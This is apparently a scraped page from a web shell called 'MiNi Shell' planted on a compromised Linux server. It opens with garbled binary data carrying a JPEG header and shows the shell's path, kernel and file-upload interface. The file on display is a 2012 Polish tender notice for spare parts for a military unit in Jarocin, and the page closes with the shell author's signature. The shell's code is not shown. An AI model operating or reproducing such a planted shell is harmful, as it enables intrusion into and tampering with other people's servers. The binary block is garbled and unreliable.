JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120907/193523-N-2012.html

<p class="kh_header"><b>Jarocin: DOSTAWĘ CZĘŚCI ZAMIENNYCH I EKSPLOATACYJNYCH  DO MASZYN I URZĄDZEŃ MECHANICZNYCH DLA JEDNOSTKI WOJSKOWEJ NR 3918 Z DOSTAWĄ DO m. JAROCIN</b><br>
<b>Numer ogłoszenia: 193523 - 2012; data zamieszczenia: 07.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 3918 , ul. Wojska Polskiego 71, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472248, faks 062 7472248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.16brl.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWĘ CZĘŚCI ZAMIENNYCH I EKSPLOATACYJNYCH  DO MASZYN I URZĄDZEŃ MECHANICZNYCH DLA JEDNOSTKI WOJSKOWEJ NR 3918 Z DOSTAWĄ DO m. JAROCIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1: CZĘŚCI DO: GROSZKOWNICA PNEUMATYCZNA MH5s, ROK PRODUKCJI 2011.
Uszczelka tłoka MH5s, nr kat. 726.5050			40szt.
Uszczelniacz komory MH5s, nr kat.  731.5059			20szt.
Frez 5-punktowy, nr kat. 426.5051			30szt.
Frez 9-punktowy, nr kat. 441.5369			30szt.
Frez krzyżowy cruciform, nr kat. 441.5360		30szt.	
Przetyczka do frezów			120szt.
PAKIET 2: CZĘŚCI DO: POSZERZARKA PNEUMATYCZNA CCMK 2VR.
Tłok 7/8 cala CCMK 2vr, nr kat. 211006			5szt.
Frez 1/2 cala			100szt.
Frez 7/8 cala, nr kat. 810003		50szt.	
Przetyczka 7/8 cala, nr kat. 205006			100szt.
Przetyczka 1/2 cala			200szt.
Tłok 1/2 cala CCMK 2vr			5szt.
PAKIET 3: CZĘŚCI DO: KARCZOWNIK LASKI F-500H/38, ROK PRODUKCJI 2011.
Szyba do F-500		4szt.	
Uszczelka do szyby			4szt.
Klin do montowania szyby			4szt.
Filtr oleju CH 38			10szt.
Filtr powietrza do ch 38			10szt.
Wkład filtra			10szt.
Noże do F-500 (1 kpl. składa się z 8 noży z śrubami i podkładkami)			10kpl
Filtr paliwa			10szt.
Pasek klinowy 17/1500 li			18szt.
Pasek klinowy 17/1525 li			18szt.
Pasek klinowy 13/825 la		4szt.	
PAKIET 4: CZĘŚCI DO: ROZDRABNIACZ DO GAŁĘZI LS 150 DW, ROK PRODUKCJI 2011.
Pasek klinowy xpb 1250lw, nr kat. 3914			24szt.
Pasek klinowy wentylatora, nr kat.  2400.115			24szt.
Filtr oleju, nr kat. 2175.104			10szt.
Filtr paliwa, nr kat. 2175.046			10szt.
Filtr powietrza, nr kat. 2175.124			10szt.
Nóż, nr kat. LS 0302		64szt.	
PAKIET 5: CZĘŚCI DO: SKROBAK PNEUMATYCZNY MHV-34, ROK PRODUKCJI 2002.
Łopatka 4 cale			30szt.
Łopatka szeroka z wymiennym ostrzem			10szt.
PAKIET 6: CZĘŚCI DO: HYDROMONITOR SMC-50961, ROK PRODUKCJI 1982.
Koszyk górny, nr kat. 200.0312			3szt.
Koszyk dolny, nr kat. 200.0001			3szt.
Talerzyk zaworu, nr kat. 013.1347			6szt.
Gniazdo górne, nr kat. 200.0002			3szt.
Gniazdo dolne, nr kat. 200.0001			3szt.
Oring, nr kat. 280.0018			9szt.
Oring, nr kat. 280.0017			3szt.
Łożysko, nr kat. 220.0001			1szt.
Łożysko, nr kat. 220.0002		1szt.	
Łożysko, nr kat. 220.0003		1szt.	
Nakrętka, nr kat. 160.0012		2szt.
Tuleja prowadząca, nr kat. 160.0010			2szt.	
Grzybek zaworu, nr kat. 010.1700			2szt.
Gniazdo zaworu, nr kat. 200.0357			szt.2
Sprężyna, nr kat. 260.0106			3szt.
Sprężyna, nr kat. 260.0107			3szt.
Dystans, nr kat. 160.2011			3szt.
Oring, nr kat. 280.0017			1szt.
Sprężyna talerzowa, nr kat. 260.0024		10szt.	
Cylinder, nr kat. 140.0967			3szt.
Nurnik, nr kat. 010.0447			3szt.
Uszczelka lamelowa, nr kat. 280.1648			3szt.
Sprężyna, nr kat. 260.0016			3szt.
Łącznik, nr kat. 160.0875			3szt.
Tuleja prowadząca, nr kat. 140.1128			3szt.
Uszczelnienie teflonowe, nr kat. 280.0453			3szt.
Łozysko, nr kat. 220.0177			2szt.
Zimering, nr kat. 280.0757			2szt.
Uszczelka lamelowa, nr kat. 280.0775			2szt.
Uszczelka lamelowa, nr kat. 280.1101			2szt.
Zawór główny, nr kat. 200.0690			1szt.
Zawór sterujący, nr kat. 200.0691			1szt.
Prowadnica zaworu, nr kat. 010.1313			1szt.
Manszeta, nr kat. 280.0058			1szt.
Gniazdo, nr kat. 200.0128			1szt.
Oring, nr kat. 280.0053			1szt.
Nakrętka, nr kat. 160.6606			1szt.
Nypel, nr kat. 180.0022			1szt.
Zabezpieczenie węża, nr kat. 320.1977			2szt.
Przewód wysokociśnieniowy DN 12x20mb			1szt.
PAKIET 7: CZĘŚCI DO: DREX-JET, ROK PRODUKCJI 1997, NR FABRYCZNY 0002.
Wałek roboczy, nr kat. 120.0546			1szt.
Werbel disk, nr kat. 341.0091			2szt.
Wkład dyszy, nr kat. 320.3577			1szt.
Dysza, nr kat. 340.0403		1szt.	
PAKIET 8: CZĘŚCI DO: ZESTAW URZĄDZEŃ DO ZALEWANIA, ROK PRODUKCJI 1992, NR   FABRYCZNY 2838.
Zawór hydrauliczny jazdy, nr kat. 211402		1szt.	
Wąż hydrauliczny, nr kat. 211418			1szt.
Wąż hydrauliczny, nr kat. 211417			1szt.
Wąż hydrauliczny, nr kat. 211405			1szt.
Palnik gazowy z regulatorem i wężem			1szt.
Lanca z regulatorem wypływu i dysza, nr kat. 211802			1szt.
Palnik gazowy spiralny, nr kat. 212801		1szt.	
Pompa zalewowa, nr kat. 211601		1szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium musi być wniesione w jednej z wybranych form jakie określone są w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Wykonawca wnosi wadium przed upływem terminu składania ofert - w wysokości:
PAKIET 1: 1500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100)
PAKIET 2: 2500,00 zł (słownie: dwa tysiące pięćset złotych 00/100)
PAKIET 3: 1200,00 zł (słownie: jeden tysiąc dwieście złotych 00/100)
PAKIET 4: 1200,00 zł (słownie: jeden tysiąc dwieście złotych 00/100)
PAKIET 5: 700,00 zł (słownie: siedemset złotych 00/100)
PAKIET 6: 1500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100)
PAKIET 7: 500,00 zł (słownie: pięćset złotych 00/100)
PAKIET 8: 600,00 zł (słownie: sześćset złotych 00/100)
Wadium w przypadku złożenia oferty na więcej niż jeden pakiet - sumuje się.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy - nr 23 1010 1469 0046 3313 9120 0000 Narodowy Bank Polski oddział okręgowy Poznań.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy, stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy, stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy, stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy, stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy, stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca składając ofertę jest zobowiązany przedstawić dokumenty potwierdzające zgodność proponowanych produktów z wymaganiami dotyczącymi przedmiotu zamówienia określonymi w rozdziale III pkt. 4 SIWZ. 
Dokumentem takim są certyfikaty potwierdzające zgodność oferowanych produktów z normami PN lub UE, aprobaty techniczne, deklaracje zgodności lub inne dokumenty potwierdzające spełnianie przez produkty postawionych wymagań. 
Zamawiający dopuszcza złożenie podpisanego oświadczenia właściciela firmy 
o zgodności dostarczanych produktów z wymaganiami polskich lub europejskich norm, złożenia aprobat technicznych, deklaracji zgodności, dokumentów potwierdzających spełnianie przez produkty postawionych wymagań lub oświadczenia - załącznik nr 5 do SIWZ.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.16brl.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3918
ul. Wojska Polskiego 71
63 - 200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2012 godzina 09:00, miejsce: Jednostka Wojskowa 3918
ul. Wojska Polskiego 71
63 - 200 Jarocin
Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com